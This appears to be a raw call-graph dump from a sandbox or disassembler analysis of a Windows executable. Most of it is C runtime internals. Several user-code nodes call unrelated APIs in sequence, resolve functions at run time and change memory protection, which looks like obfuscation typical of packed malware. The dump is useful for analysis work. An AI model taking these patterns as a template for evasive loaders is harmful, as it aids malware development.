__close 11860->11861 11861->11804 11862->11860 11864 4122e4 __close 11863->11864 11865 4122fc 11864->11865 11873 41231b _memset 11864->11873 11876 40b78c 11865->11876 11869 41238d RtlAllocateHeap 11869->11873 11870 412311 __close 11870->11819 11873->11869 11873->11870 11882 40e43f 11873->11882 11889 40ec51 11873->11889 11895 4123d4 11873->11895 11898 40e26b 11873->11898 11901 40de2a GetLastError 11876->11901 11878 40b791 11879 408baf 11878->11879 11880 40dc57 __decode_pointer 6 API calls 11879->11880 11881 408bbf __invoke_watson 11880->11881 11883 40e454 11882->11883 11884 40e467 EnterCriticalSection 11882->11884 11948 40e37c 11883->11948 11884->11873 11886 40e45a 11886->11884 11887 40f461 __amsg_exit 67 API calls 11886->11887 11888 40e466 11887->11888 11888->11884 11890 40ec7f 11889->11890 11891 40ed18 11890->11891 11894 40ed21 11890->11894 12141 40e7b8 11890->12141 11891->11894 12148 40e868 11891->12148 11894->11873 12152 40e365 LeaveCriticalSection 11895->12152 11897 4123db 11897->11873 11899 40dc57 __decode_pointer 6 API calls 11898->11899 11900 40e27b 11899->11900 11900->11873 11915 40dcd2 TlsGetValue 11901->11915 11904 40de97 SetLastError 11904->11878 11905 40a2da __calloc_crt 65 API calls 11906 40de55 11905->11906 11906->11904 11907 40dc57 __decode_pointer 6 API calls 11906->11907 11908 40de6f 11907->11908 11909 40de76 11908->11909 11910 40de8e 11908->11910 11911 40dd43 __mtinit 65 API calls 11909->11911 11920 4089ea 11910->11920 11913 40de7e GetCurrentThreadId 11911->11913 11913->11904 11914 40de94 11914->11904 11916 40dd02 11915->11916 11917 40dce7 11915->11917 11916->11904 11916->11905 11918 40dc57 __decode_pointer 6 API calls 11917->11918 11919 40dcf2 TlsSetValue 11918->11919 11919->11916 11921 4089f6 __close 11920->11921 11922 408a35 11921->11922 11924 40e43f __lock 66 API calls 11921->11924 11928 408a6f __dosmaperr __close 11921->11928 11923 408a4a HeapFree 11922->11923 11922->11928 11925 408a5c 11923->11925 11923->11928 11929 408a0d ___sbh_find_block 11924->11929 11926 40b78c _write_string 66 API calls 11925->11926 11927 408a61 GetLastError 11926->11927 11927->11928 11928->11914 11930 408a27 11929->11930 11933 40e4a2 11929->11933 11940 408a40 11930->11940 11934 40e4e1 11933->11934 11939 40e783 11933->11939 11935 40e6cd VirtualFree 11934->11935 11934->11939 11936 40e731 11935->11936 11937 40e740 VirtualFree HeapFree 11936->11937 11936->11939 11943 40b7e0 11937->11943 11939->11930 11947 40e365 LeaveCriticalSection 11940->11947 11942 408a47 11942->11922 11944 40b7f8 11943->11944 11945 40b81f __VEC_memcpy 11944->11945 11946 40b827 11944->11946 11945->11946 11946->11939 11947->11942 11949 40e388 __close 11948->11949 11950 40e3ae 11949->11950 11974 40fb26 11949->11974 11958 40e3be __close 11950->11958 12020 40a295 11950->12020 11956 40e3d0 11960 40b78c _write_string 68 API calls 11956->11960 11957 40e3df 11961 40e43f __lock 68 API calls 11957->11961 11958->11886 11960->11958 11963 40e3e6 11961->11963 11964 40e41a 11963->11964 11965 40e3ee 11963->11965 11966 4089ea __setlocale_get_all 68 API calls 11964->11966 11967 416ef2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 11965->11967 11968 40e40b 11966->11968 11969 40e3f9 11967->11969 12026 40e436 11968->12026 11969->11968 11970 4089ea __setlocale_get_all 68 API calls 11969->11970 11972 40e405 11970->11972 11973 40b78c _write_string 68 API calls 11972->11973 11973->11968 12029 4172fd 11974->12029 11977 40f97b __NMSG_WRITE 68 API calls 11979 40fb52 11977->11979 11978 4172fd __set_error_mode 68 API calls 11980 40fb3a 11978->11980 11981 40f97b __NMSG_WRITE 68 API calls 11979->11981 11980->11977 11982 40e39d 11980->11982 11981->11982 11983 40f97b 11982->11983 11984 40f98f 11983->11984 11985 4172fd __set_error_mode 65 API calls 11984->11985 12016 40e3a4 11984->12016 11986 40f9b1 11985->11986 11987 40faef GetStdHandle 11986->11987 11989 4172fd __set_error_mode 65 API calls 11986->11989 11988 40fafd _strlen 11987->11988 11987->12016 11991 40fb16 WriteFile 11988->11991 11988->12016 11990 40f9c2 11989->11990 11990->11987 11992 40f9d4 11990->11992 11991->12016 11992->12016 12035 40b449 11992->12035 11995 40fa0a GetModuleFileNameA 11997 40fa28 11995->11997 12002 40fa4b _strlen 11995->12002 11999 40b449 _strcpy_s 65 API calls 11997->11999 12000 40fa38 11999->12000 12000->12002 12003 408a87 __invoke_watson 10 API calls 12000->12003 12001 40fa8e 12060 413088 12001->12060 12002->12001 12051 413146 12002->12051 12003->12002 12008 40fab2 12010 413088 _strcat_s 65 API calls 12008->12010 12009 408a87 __invoke_watson 10 API calls 12009->12008 12012 40fac6 12010->12012 12011 408a87 __invoke_watson 10 API calls 12011->12001 12013 40fad7 12012->12013 12014 408a87 __invoke_watson 10 API calls 12012->12014 12069 417194 12013->12069 12014->12013 12017 40f4b5 12016->12017 12107 40f48a GetModuleHandleW 12017->12107 12023 40a29e 12020->12023 12022 40a2d4 12022->11956 12022->11957 12023->12022 12024 40a2b5 Sleep 12023->12024 12110 40b500 12023->12110 12025 40a2ca 12024->12025 12025->12022 12025->12023 12140 40e365 LeaveCriticalSection 12026->12140 12028 40e43d 12028->11958 12031 41730c 12029->12031 12030 40b78c _write_string 68 API calls 12033 41732f 12030->12033 12031->12030 12032 40fb2d 12031->12032 12032->11978 12032->11980 12034 408baf __close 6 API calls 12033->12034 12034->12032 12036 40b45a 12035->12036 12038 40b461 12035->12038 12036->12038 12042 40b487 12036->12042 12037 40b78c _write_string 68 API calls 12039 40b466 12037->12039 12038->12037 12040 408baf __close 6 API calls 12039->12040 12041 40b475 12040->12041 12041->11995 12044 408a87 12041->12044 12042->12041 12043 40b78c _write_string 68 API calls 12042->12043 12043->12039 12096 40b6d0 12044->12096 12046 408ab4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12047 408b90 GetCurrentProcess TerminateProcess 12046->12047 12048 408b84 __invoke_watson 12046->12048 12098 40a40b 12047->12098 12048->12047 12050 408bad 12050->11995 12055 413158 12051->12055 12052 41315c 12053 40fa7b 12052->12053 12054 40b78c _write_string 68 API calls 12052->12054 12053->12001 12053->12011 12056 413178 12054->12056 12055->12052 12055->12053 12058 4131a2 12055->12058 12057 408baf __close 6 API calls 12056->12057 12057->12053 12058->12053 12059 40b78c _write_string 68 API calls 12058->12059 12059->12056 12061 4130a0 12060->12061 12062 413099 12060->12062 12063 40b78c _write_string 68 API calls 12061->12063 12062->12061 12066 4130d4 12062->12066 12068 4130a5 12063->12068 12064 408baf __close 6 API calls 12065 40faa1 12064->12065 12065->12008 12065->12009 12066->12065 12067 40b78c _write_string 68 API calls 12066->12067 12067->12068 12068->12064 12070 40dc4e _raise 7 API calls 12069->12070 12071 4171a4 12070->12071 12072 4171b7 LoadLibraryA 12071->12072 12074 41723f 12071->12074 12073 4171cc GetProcAddress 12072->12073 12076 4172e1 12072->12076 12075 4171e2 12073->12075 12073->12076 12079 40dc57 __decode_pointer 6 API calls 12074->12079 12091 417269 12074->12091 12080 40dbdc __encode_pointer 7 API calls 12075->12080 12076->12016 12077 40dc57 __decode_pointer 6 API calls 12077->12076 12078 40dc57 __decode_pointer 6 API calls 12088 4172ac 12078->12088 12081 41725c 12079->12081 12082 4171e8 GetProcAddress 12080->12082 12083 40dc57 __decode_pointer 6 API calls 12081->12083 12084 40dbdc __encode_pointer 7 API calls 12082->12084 12083->12091 12085 4171fd GetProcAddress 12084->12085 12086 40dbdc __encode_pointer 7 API calls 12085->12086 12087 417212 GetProcAddress 12086->12087 12089 40dbdc __encode_pointer 7 API calls 12087->12089 12090 40dc57 __decode_pointer 6 API calls 12088->12090 12094 417294 12088->12094 12092 417227 12089->12092 12090->12094 12091->12078 12091->12094 12092->12074 12093 417231 GetProcAddress 12092->12093 12095 40dbdc __encode_pointer 7 API calls 12093->12095 12094->12077 12095->12074 12097 40b6dc __VEC_memzero 12096->12097 12097->12046 12099 40a413 12098->12099 12100 40a415 IsDebuggerPresent 12098->12100 12099->12050 12106 40f12c 12100->12106 12103 4124c3 SetUnhandledExceptionFilter UnhandledExceptionFilter 12104 4124e0 __invoke_watson 12103->12104 12105 4124e8 GetCurrentProcess TerminateProcess 12103->12105 12104->12105 12105->12050 12106->12103 12108 40f4ae ExitProcess 12107->12108 12109 40f49e GetProcAddress 12107->12109 12109->12108 12111 40b5b3 12110->12111 12118 40b512 12110->12118 12112 40e26b __calloc_impl 6 API calls 12111->12112 12114 40b5b9 12112->12114 12113 40b523 12115 40fb26 __FF_MSGBANNER 67 API calls 12113->12115 12113->12118 12120 40f97b __NMSG_WRITE 67 API calls 12113->12120 12122 40f4b5 _malloc 3 API calls 12113->12122 12116 40b78c _write_string 67 API calls 12114->12116 12115->12113 12117 40b5ab 12116->12117 12117->12023 12118->12113 12118->12117 12121 40b56f RtlAllocateHeap 12118->12121 12123 40b59f 12118->12123 12124 40e26b __calloc_impl 6 API calls 12118->12124 12126 40b5a4 12118->12126 12128 40b4b1 12118->12128 12120->12113 12121->12118 12122->12113 12125 40b78c _write_string 67 API calls 12123->12125 12124->12118 12125->12126 12127 40b78c _write_string 67 API calls 12126->12127 12127->12117 12129 40b4bd __close 12128->12129 12130 40b4ee __close 12129->12130 12131 40e43f __lock 68 API calls 12129->12131 12130->12118 12132 40b4d3 12131->12132 12133 40ec51 ___sbh_alloc_block 5 API calls 12132->12133 12134 40b4de 12133->12134 12136 40b4f7 12134->12136 12139 40e365 LeaveCriticalSection 12136->12139 12138 40b4fe 12138->12130 12139->12138 12140->12028 12142 40e7cb HeapReAlloc 12141->12142 12143 40e7ff HeapAlloc 12141->12143 12144 40e7e9 12142->12144 12145 40e7ed 12142->12145 12143->12144 12146 40e822 VirtualAlloc 12143->12146 12144->11891 12145->12143 12146->12144 12147 40e83c HeapFree 12146->12147 12147->12144 12149 40e87f VirtualAlloc 12148->12149 12151 40e8c6 12149->12151 12151->11894 12152->11897 12153->11825 12172 40e365 LeaveCriticalSection 12154->12172 12156 40ddda 12156->11835 12158 40a601 12157->12158 12159 40a5fe InterlockedIncrement 12157->12159 12160 40a60b InterlockedIncrement 12158->12160 12161 40a60e 12158->12161 12159->12158 12160->12161 12162 40a618 InterlockedIncrement 12161->12162 12163 40a61b 12161->12163 12162->12163 12164 40a625 InterlockedIncrement 12163->12164 12165 40a628 12163->12165 12164->12165 12166 40a641 InterlockedIncrement 12165->12166 12167 40a65c InterlockedIncrement 12165->12167 12168 40a651 InterlockedIncrement 12165->12168 12166->12165 12167->11838 12168->12165 12173 40e365 LeaveCriticalSection 12169->12173 12171 40de28 12171->11840 12172->12156 12173->12171 12174->11689 12176 4181c0 12175->12176 12177 4181b9 12175->12177 12178 40b78c _write_string 68 API calls 12176->12178 12177->12176 12181 4181ec 12177->12181 12179 4181c5 12178->12179 12180 408baf __close 6 API calls 12179->12180 12182 4181d4 12180->12182 12181->12182 12183 40b78c _write_string 68 API calls 12181->12183 12182->11717 12183->12179 12185 40c626 12184->12185 12186 40dbdc __encode_pointer 7 API calls 12185->12186 12187 40c63e 12185->12187 12186->12185 12187->11728 12191 408f0c 12188->12191 12190 408f55 12190->11730 12192 408f18 __close 12191->12192 12199 40f4cd 12192->12199 12198 408f39 __close 12198->12190 12200 40e43f __lock 68 API calls 12199->12200 12201 408f1d 12200->12201 12202 408e21 12201->12202 12203 40dc57 __decode_pointer 6 API calls 12202->12203 12204 408e35 12203->12204 12205 40dc57 __decode_pointer 6 API calls 12204->12205 12206 408e45 12205->12206 12207 408ec8 12206->12207 12222 40f38e 12206->12222 12219 408f42 12207->12219 12209 408eaf 12210 40dbdc __encode_pointer 7 API calls 12209->12210 12213 408ebd 12210->12213 12211 408e87 12211->12207 12216 40a326 __realloc_crt 74 API calls 12211->12216 12217 408e9d 12211->12217 12212 408e63 12212->12209 12212->12211 12235 40a326 12212->12235 12215 40dbdc __encode_pointer 7 API calls 12213->12215 12215->12207 12216->12217 12217->12207 12218 40dbdc __encode_pointer 7 API calls 12217->12218 12218->12209 12284 40f4d6 12219->12284 12223 40f39a __close 12222->12223 12224 40f3aa 12223->12224 12226 40f3c7 12223->12226 12225 40b78c _write_string 68 API calls 12224->12225 12228 40f3af 12225->12228 12227 40f408 HeapSize 12226->12227 12229 40e43f __lock 68 API calls 12226->12229 12231 40f3bf __close 12227->12231 12230 408baf __close 6 API calls 12228->12230 12232 40f3d7 ___sbh_find_block 12229->12232 12230->12231 12231->12212 12240 40f428 12232->12240 12237 40a32f 12235->12237 12238 40a36e 12237->12238 12239 40a34f Sleep 12237->12239 12244 408be5 12237->12244 12238->12211 12239->12237 12243 40e365 LeaveCriticalSection 12240->12243 12242 40f403 12242->12227 12242->12231 12243->12242 12245 408bf1 __close 12244->12245 12246 408c06 12245->12246 12247 408bf8 12245->12247 12249 408c19 12246->12249 12250 408c0d 12246->12250 12248 40b500 _malloc 68 API calls 12247->12248 12266 408c00 __dosmaperr __close 12248->12266 12256 408d8b 12249->12256 12278 408c26 ___sbh_resize_block ___sbh_find_block _setlocale 12249->12278 12251 4089ea __setlocale_get_all 68 API calls 12250->12251 12251->12266 12252 408dbe 12255 40e26b __calloc_impl 6 API calls 12252->12255 12253 408d90 HeapReAlloc 12253->12256 12253->12266 12254 40e43f __lock 68 API calls 12254->12278 12257 408dc4 12255->12257 12256->12252 12256->12253 12259 408de2 12256->12259 12260 40e26b __calloc_impl 6 API calls 12256->12260 12263 408dd8 12256->12263 12258 40b78c _write_string 68 API calls 12257->12258 12258->12266 12261 40b78c _write_string 68 API calls 12259->12261 12259->12266 12260->12256 12262 408deb GetLastError 12261->12262 12262->12266 12265 40b78c _write_string 68 API calls 12263->12265 12268 408d59 12265->12268 12266->12237 12267 408cb1 HeapAlloc 12267->12278 12268->12266 12270 408d5e GetLastError 12268->12270 12269 408d06 HeapReAlloc 12269->12278 12270->12266 12271 40ec51 ___sbh_alloc_block 5 API calls 12271->12278 12272 408d71 12272->12266 12274 40b78c _write_string 68 API calls 12272->12274 12273 40e26b __calloc_impl 6 API calls 12273->12278 12275 408d7e 12274->12275 12275->12262 12275->12266 12276 408d54 12277 40b78c _write_string 68 API calls 12276->12277 12277->12268 12278->12252 12278->12254 12278->12266 12278->12267 12278->12269 12278->12271 12278->12272 12278->12273 12278->12276 12279 40e4a2 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 12278->12279 12280 408d29 12278->12280 12279->12278 12283 40e365 LeaveCriticalSection 12280->12283 12282 408d30 12282->12278 12283->12282 12287 40e365 LeaveCriticalSection 12284->12287 12286 408f47 12286->12198 12287->12286 12289 405476 12288->12289 12290 40547e SetLastError GetTickCount 12289->12290 12291 4054ae 12289->12291 12290->12289 12292 4054cc LoadLibraryA 12291->12292 12293 4054e0 12291->12293 12292->12291 12395 405453 GlobalAlloc 12293->12395 12295 4054e5 12296 405533 12295->12296 12297 4054ef 12295->12297 12299 40554b 11 API calls 12296->12299 12301 4055b8 12296->12301 12297->12296 12300 4054fe AreFileApisANSI GetNamedPipeHandleStateW InterlockedIncrement 12297->12300 12405 405224 12297->12405 12299->12296 12300->12297 12302 4055cf GetModuleHandleA 12301->12302 12303 4055db GetModuleHandleA 12301->12303 12304 4055ef GetProcAddress 12301->12304 12302->12301 12303->12301 12305 405609 12304->12305 12307 40561c 12305->12307 12396 405355 GetModuleHandleA GetProcAddress VirtualProtect 12305->12396 12397 4051a8 12307->12397 12309 40563d InterlockedIncrement GetCharWidthA 12310 405632 12309->12310 12310->12309 12311 405667 12310->12311 12312 405675 SetThreadToken 12311->12312 12313 405680 12311->12313 12312->12311 12404 404f21 LoadLibraryW 12313->12404 12315 405685 12316 4056d6 12315->12316 12317 405697 7 API calls 12315->12317 12318 4056e4 22 API calls 12316->12318 12319 4057de 12316->12319 12317->12316 12318->12319 12319->11739 12415 4092aa 12320->12415 12323 4091e5 12324 4091f1 __close 12323->12324 12325 40921c __flsbuf 12324->12325 12326 4091ff 12324->12326 12876 40fc77 12325->12876 12327 40b78c _write_string 68 API calls 12326->12327 12328 409204 12327->12328 12330 408baf __close 6 API calls 12328->12330 12332 409214 __close 12330->12332 12331 40922e __flsbuf 12881 4100fe 12331->12881 12332->11738 12334 409240 __flsbuf 12335 410274 __output_l 104 API calls 12334->12335 12336 409258 __flsbuf 12335->12336 12888 41019a 12336->12888 12341 4091c7 GetLastError 12340->12341 12342 4091cf 12340->12342 12341->12342 12343 4091e1 12342->12343 12344 40b7b2 __dosmaperr 68 API calls 12342->12344 12343->11741 12345 4091db 12344->12345 12345->11741 12347 4090b5 __close 12346->12347 12348 4090e8 12347->12348 12349 4090c8 12347->12349 12908 40fc36 12348->12908 12350 40b78c _write_string 68 API calls 12349->12350 12352 4090cd 12350->12352 12354 408baf __close 6 API calls 12352->12354 12360 4090dd __close 12354->12360 12355 409168 12357 409179 12355->12357 12359 40fd14 __flsbuf 102 API calls 12355->12359 12356 4100cc __fileno 68 API calls 12361 4090fe 12356->12361 12914 4091ad 12357->12914 12359->12357 12360->11743 12361->12355 12362 40b78c _write_string 68 API calls 12361->12362 12363 409158 12362->12363 12364 408baf __close 6 API calls 12363->12364 12364->12355 12366 40908b GetLastError 12365->12366 12367 409093 12365->12367 12366->12367 12368 4090a5 12367->12368 12369 40b7b2 __dosmaperr 68 API calls 12367->12369 12368->11745 12370 40909f 12369->12370 12370->11745 12372 4074fb std::_String_base::_Xlen __EH_prolog 12371->12372 12924 406bd1 12372->12924 12377 4076b8 12378 4076c2 __EH_prolog 12377->12378 13128 407643 12378->13128 12383 408f5f 12384 408f7e 12383->12384 12387 408f85 12383->12387 12385 40f97b __NMSG_WRITE 68 API calls 12384->12385 12385->12387 13409 40f7be 12387->13409 12389 408f96 _memset 12390 40906e 12389->12390 12393 40902e SetUnhandledExceptionFilter UnhandledExceptionFilter 12389->12393 13433 40f6e7 12390->13433 12393->12390 12395->12295 12396->12305 12398 4051ba MoveFileWithProgressA 12397->12398 12400 4051cd 12397->12400 12398->12400 12399 40521d 12399->12310 12400->12399 12401 4051ea CopyFileExA 12400->12401 12402 4051ff TlsGetValue EnumSystemCodePagesA 12400->12402 12409 40501b 12400->12409 12401->12400 12402->12400 12404->12315 12406 405231 __write_nolock 12405->12406 12407 405324 12406->12407 12408 40523e 19 API calls 12406->12408 12407->12297 12408->12407 12412 405028 __write_nolock 12409->12412 12410 405076 GetConsoleAliasExesLengthW 12410->12412 12411 405099 CopyFileExA GetTickCount InterlockedExchange LocalSize 12411->12412 12412->12410 12412->12411 12413 4050fe GetComputerNameA GetVolumeInformationA WriteConsoleW 12412->12413 12414 405199 12412->12414 12413->12412 12414->12400 12416 4092d7 12415->12416 12417 4092ba 12415->12417 12416->12417 12419 4092de 12416->12419 12418 40b78c _write_string 68 API calls 12417->12418 12420 4092bf 12418->12420 12426 410274 12419->12426 12422 408baf __close 6 API calls 12420->12422 12424 405806 12422->12424 12424->12323 12467 409520 12426->12467 12429 4102df 12430 40b78c _write_string 68 API calls 12429->12430 12432 4102e4 12430->12432 12433 408baf __close 6 API calls 12432->12433 12434 4102f6 12433->12434 12435 40a40b ___mtold12 5 API calls 12434->12435 12436 409305 12435->12436 12436->12424 12446 40fd14 12436->12446 12438 4101ce 102 API calls _write_string 12442 410320 __output_l __aulldvrm _strlen 12438->12442 12439 4089ea __setlocale_get_all 68 API calls 12439->12442 12440 410227 102 API calls _write_string 12440->12442 12441 418140 80 API calls __cftof 12441->12442 12442->12429 12442->12434 12442->12438 12442->12439 12442->12440 12442->12441 12443 40a295 __malloc_crt 68 API calls 12442->12443 12444 40dc57 6 API calls __decode_pointer 12442->12444 12445 410201 102 API calls _write_multi_char 12442->12445 12481 41815d 12442->12481 12443->12442 12444->12442 12445->12442 12447 4100cc __fileno 68 API calls 12446->12447 12448 40fd24 12447->12448 12449 40fd46 12448->12449 12450 40fd2f 12448->12450 12452 40fd4a 12449->12452 12460 40fd57 __flsbuf 12449->12460 12451 40b78c _write_string 68 API calls 12450->12451 12462 40fd34 12451->12462 12453 40b78c _write_string 68 API calls 12452->12453 12453->12462 12454 40fdb8 12455 40fe47 12454->12455 12456 40fdc7 12454->12456 12457 417e4b __locking 102 API calls 12455->12457 12458 40fdde 12456->12458 12463 40fdfb 12456->12463 12457->12462 12704 417e4b 12458->12704 12460->12454 12460->12462 12464 40fdad 12460->12464 12692 417f70 12460->12692 12462->12424 12463->12462 12729 4175ff 12463->12729 12464->12454 12701 417f27 12464->12701 12468 409533 12467->12468 12474 409580 12467->12474 12484 40dea3 12468->12484 12471 409560 12471->12474 12504 411644 12471->12504 12474->12429 12474->12442 12475 4100cc 12474->12475 12476 4100db 12475->12476 12480 4100f0 12475->12480 12477 40b78c _write_string 68 API calls 12476->12477 12478 4100e0 12477->12478 12479 408baf __close 6 API calls 12478->12479 12479->12480 12480->12442 12482 409520 _LocaleUpdate::_LocaleUpdate 78 API calls 12481->12482 12483 418170 12482->12483 12483->12442 12485 40de2a __getptd_noexit 68 API calls 12484->12485 12486 40deab 12485->12486 12487 409538 12486->12487 12488 40f461 __amsg_exit 68 API calls 12486->12488 12487->12471 12489 40a76c 12487->12489 12488->12487 12490 40a778 __close 12489->12490 12491 40dea3 __getptd 68 API calls 12490->12491 12492 40a77d 12491->12492 12493 40a7ab 12492->12493 12495 40a78f 12492->12495 12494 40e43f __lock 68 API calls 12493->12494 12496 40a7b2 12494->12496 12497 40dea3 __getptd 68 API calls 12495->12497 12520 40a72e 12496->12520 12502 40a794 12497->12502 12501 40a7a2 __close 12501->12471 12502->12501 12503 40f461 __amsg_exit 68 API calls 12502->12503 12503->12501 12505 411650 __close 12504->12505 12506 40dea3 __getptd 68 API calls 12505->12506 12507 411655 12506->12507 12508 411667 12507->12508 12509 40e43f __lock 68 API calls 12507->12509 12511 411675 __close 12508->12511 12513 40f461 __amsg_exit 68 API calls 12508->12513 12510 411685 12509->12510 12512 4116ce 12510->12512 12515 4116b6 InterlockedIncrement 12510->12515 12516 41169c InterlockedDecrement 12510->12516 12511->12474 12688 4116df 12512->12688 12513->12511 12515->12512 12516->12515 12517 4116a7 12516->12517 12517->12515 12518 4089ea __setlocale_get_all 68 API calls 12517->12518 12519 4116b5 12518->12519 12519->12515 12521 40a764 12520->12521 12522 40a732 12520->12522 12528 40a7d6 12521->12528 12522->12521 12523 40a5e0 ___addlocaleref 8 API calls 12522->12523 12524 40a745 12523->12524 12524->12521 12531 40a66f 12524->12531 12687 40e365 LeaveCriticalSection 12528->12687 12530 40a7dd 12530->12502 12532 40a680 InterlockedDecrement 12531->12532 12533 40a703 12531->12533 12534 40a695 InterlockedDecrement 12532->12534 12535 40a698 12532->12535 12533->12521 12545 40a497 12533->12545 12534->12535 12536 40a6a2 InterlockedDecrement 12535->12536 12537 40a6a5 12535->12537 12536->12537 12538 40a6b2 12537->12538 12539 40a6af InterlockedDecrement 12537->12539 12540 40a6bc InterlockedDecrement 12538->12540 12542 40a6bf 12538->12542 12539->12538 12540->12542 12541 40a6d8 InterlockedDecrement 12541->12542 12542->12541 12543 40a6e8 InterlockedDecrement 12542->12543 12544 40a6f3 InterlockedDecrement 12542->12544 12543->12542 12544->12533 12546 40a51b 12545->12546 12547 40a4ae 12545->12547 12548 40a568 12546->12548 12549 4089ea __setlocale_get_all 68 API calls 12546->12549 12547->12546 12556 4089ea __setlocale_get_all 68 API calls 12547->12556 12571 40a4e2 12547->12571 12562 40a58f 12548->12562 12599 412917 12548->12599 12551 40a53c 12549->12551 12553 4089ea __setlocale_get_all 68 API calls 12551->12553 12558 40a54f 12553->12558 12554 4089ea __setlocale_get_all 68 API calls 12559 40a510 12554->12559 12555 40a5d4 12560 4089ea __setlocale_get_all 68 API calls 12555->12560 12561 40a4d7 12556->12561 12557 4089ea __setlocale_get_all 68 API calls 12557->12562 12564 4089ea __setlocale_get_all 68 API calls 12558->12564 12566 4089ea __setlocale_get_all 68 API calls 12559->12566 12567 40a5da 12560->12567 12575 412d34 12561->12575 12562->12555 12565 4089ea 68 API calls __setlocale_get_all 12562->12565 12563 4089ea __setlocale_get_all 68 API calls 12569 40a4f8 12563->12569 12570 40a55d 12564->12570 12565->12562 12566->12546 12567->12521 12591 412b25 12569->12591 12573 4089ea __setlocale_get_all 68 API calls 12570->12573 12571->12563 12574 40a503 12571->12574 12573->12548 12574->12554 12576 412d41 12575->12576 12577 412dbe 12575->12577 12578 412d52 12576->12578 12580 4089ea __setlocale_get_all 68 API calls 12576->12580 12577->12571 12579 412d64 12578->12579 12581 4089ea __setlocale_get_all 68 API calls 12578->12581 12582 412d76 12579->12582 12583 4089ea __setlocale_get_all 68 API calls 12579->12583 12580->12578 12581->12579 12584 412d88 12582->12584 12585 4089ea __setlocale_get_all 68 API calls 12582->12585 12583->12582 12586 412d9a 12584->12586 12588 4089ea __setlocale_get_all 68 API calls 12584->12588 12585->12584 12587 412dac 12586->12587 12589 4089ea __setlocale_get_all 68 API calls 12586->12589 12587->12577 12590 4089ea __setlocale_get_all 68 API calls 12587->12590 12588->12586 12589->12587 12590->12577 12592 412b32 12591->12592 12598 412b66 12591->12598 12593 412b42 12592->12593 12594 4089ea __setlocale_get_all 68 API calls 12592->12594 12595 4089ea __setlocale_get_all 68 API calls 12593->12595 12596 412b54 12593->12596 12594->12593 12595->12596 12597 4089ea __setlocale_get_all 68 API calls 12596->12597 12596->12598 12597->12598 12598->12574 12600 40a588 12599->12600 12601 412928 12599->12601 12600->12557 12602 4089ea __setlocale_get_all 68 API calls 12601->12602 12603 412930 12602->12603 12604 4089ea __setlocale_get_all 68 API calls 12603->12604 12605 412938 12604->12605 12606 4089ea __setlocale_get_all 68 API calls 12605->12606 12607 412940 12606->12607 12608 4089ea __setlocale_get_all 68 API calls 12607->12608 12609 412948 12608->12609 12610 4089ea __setlocale_get_all 68 API calls 12609->12610 12611 412950 12610->12611 12612 4089ea __setlocale_get_all 68 API calls 12611->12612 12613 412958 12612->12613 12614 4089ea __setlocale_get_all 68 API calls 12613->12614 12615 41295f 12614->12615 12616 4089ea __setlocale_get_all 68 API calls 12615->12616 12617 412967 12616->12617 12618 4089ea __setlocale_get_all 68 API calls 12617->12618 12619 41296f 12618->12619 12620 4089ea __setlocale_get_all 68 API calls 12619->12620 12621 412977 12620->12621 12622 4089ea __setlocale_get_all 68 API calls 12621->12622 12623 41297f 12622->12623 12624 4089ea __setlocale_get_all 68 API calls 12623->12624 12625 412987 12624->12625 12626 4089ea __setlocale_get_all 68 API calls 12625->12626 12627 41298f 12626->12627 12628 4089ea __setlocale_get_all 68 API calls 12627->12628 12629 412997 12628->12629 12630 4089ea __setlocale_get_all 68 API calls 12629->12630 12631 41299f 12630->12631 12632 4089ea __setlocale_get_all 68 API calls 12631->12632 12633 4129a7 12632->12633 12634 4089ea __setlocale_get_all 68 API calls 12633->12634 12635 4129b2 12634->12635 12636 4089ea __setlocale_get_all 68 API calls 12635->12636 12637 4129ba 12636->12637 12638 4089ea __setlocale_get_all 68 API calls 12637->12638 12639 4129c2 12638->12639 12640 4089ea __setlocale_get_all 68 API calls 12639->12640 12641 4129ca 12640->12641 12642 4089ea __setlocale_get_all 68 API calls 12641->12642 12643 4129d2 12642->12643 12644 4089ea __setlocale_get_all 68 API calls 12643->12644 12645 4129da 12644->12645 12646 4089ea __setlocale_get_all 68 API calls 12645->12646 12647 4129e2 12646->12647 12648 4089ea __setlocale_get_all 68 API calls 12647->12648 12649 4129ea 12648->12649 12650 4089ea __setlocale_get_all 68 API calls 12649->12650 12651 4129f2 12650->12651 12652 4089ea __setlocale_get_all 68 API calls 12651->12652 12653 4129fa 12652->12653 12654 4089ea __setlocale_get_all 68 API calls 12653->12654 12655 412a02 12654->12655 12656 4089ea __setlocale_get_all 68 API calls 12655->12656 12657 412a0a 12656->12657 12658 4089ea __setlocale_get_all 68 API calls 12657->12658 12659 412a12 12658->12659 12660 4089ea __setlocale_get_all 68 API calls 12659->12660 12661 412a1a 12660->12661 12662 4089ea __setlocale_get_all 68 API calls 12661->12662 12663 412a22 12662->12663 12664 4089ea __setlocale_get_all 68 API calls 12663->12664 12665 412a2a 12664->12665 12666 4089ea __setlocale_get_all 68 API calls 12665->12666 12667 412a38 12666->12667 12668 4089ea __setlocale_get_all 68 API calls 12667->12668 12669 412a43 12668->12669 12670 4089ea __setlocale_get_all 68 API calls 12669->12670 12671 412a4e 12670->12671 12672 4089ea __setlocale_get_all 68 API calls 12671->12672 12673 412a59 12672->12673 12674 4089ea __setlocale_get_all 68 API calls 12673->12674 12675 412a64 12674->12675 12676 4089ea __setlocale_get_all 68 API calls 12675->12676 12677 412a6f 12676->12677 12678 4089ea __setlocale_get_all 68 API calls 12677->12678 12679 412a7a 12678->12679 12680 4089ea __setlocale_get_all 68 API calls 12679->12680 12681 412a85 12680->12681 12682 4089ea __setlocale_get_all 68 API calls 12681->12682 12683 412a90 12682->12683 12684 4089ea __setlocale_get_all 68 API calls 12683->12684 12685 412a9b 12684->12685 12686 4089ea __setlocale_get_all 68 API calls 12685->12686 12686->12600 12687->12530 12691 40e365 LeaveCriticalSection 12688->12691 12690 4116e6 12690->12508 12691->12690 12693 417f7d 12692->12693 12694 417f8c 12692->12694 12695 40b78c _write_string 68 API calls 12693->12695 12697 417fb0 12694->12697 12698 40b78c _write_string 68 API calls 12694->12698 12696 417f82 12695->12696 12696->12464 12697->12464 12699 417fa0 12698->12699 12700 408baf __close 6 API calls 12699->12700 12700->12697 12702 40a295 __malloc_crt 68 API calls 12701->12702 12703 417f3c 12702->12703 12703->12454 12705 417e57 __close 12704->12705 12706 417e7a 12705->12706 12707 417e5f 12705->12707 12709 417e88 12706->12709 12714 417ec9 12706->12714 12761 40b79f 12707->12761 12711 40b79f __close 68 API calls 